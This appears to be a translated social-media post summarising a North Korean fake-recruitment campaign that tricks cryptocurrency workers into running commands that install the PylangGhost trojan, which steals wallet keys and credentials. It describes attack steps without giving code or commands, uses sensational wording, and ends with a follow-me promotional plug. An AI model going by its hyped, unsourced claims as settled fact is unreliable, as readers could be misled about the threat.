National-level hacker 'Pig Butchering' upgrade: 80 wallet plugins targeted by PylangGhost Trojan with precision
Attack chain: From fake recruitment to asset zeroing
North Korean hacker group 'Famous Chollima' (codename Wagemole) this month targets cryptocurrency practitioners in India and other regions, luring victims through counterfeit recruitment websites like Coinbase and Robinhood:
Phishing trap: Fake official website 1:1 replica of LOGO, job JD, requiring real tech stack and email submission
Video interview trick: Claiming the need to install 'exclusive driver', misleading victims into executing malicious commands (PowerShell for Windows, Bash for Mac)
Trojan implantation: Commands automatically download ZIP packages containing PylangGhost Trojan, renaming Python files to bypass detection
Bold remarks: This is a dimensionality reduction strike by a national-level APT team — using offers as bait, wielding technology as a scythe
Trojan city slaughter: 80 wallet plugins exposed, on-chain assets instantly moved
Three core functions of PylangGhost targeting core assets:
Credential siphoning pump: Hijacking over 80 browser plugins such as MetaMask and TronLink, directly extracting mnemonic phrases, private keys, and password manager data
Screen monitoring: Real-time capture of transaction pages, 2FA verification codes, combined with keystroke logging to restore operation paths
Cross-platform adaptation: Python variant infecting Windows, GolangGhost variant infecting Mac, Linux has not yet been affected
If you currently feel helpless and confused in trading, want to learn more about cryptocurrency knowledge and first-hand cutting-edge information, click on my profile and follow me, don't get lost in this bull market!
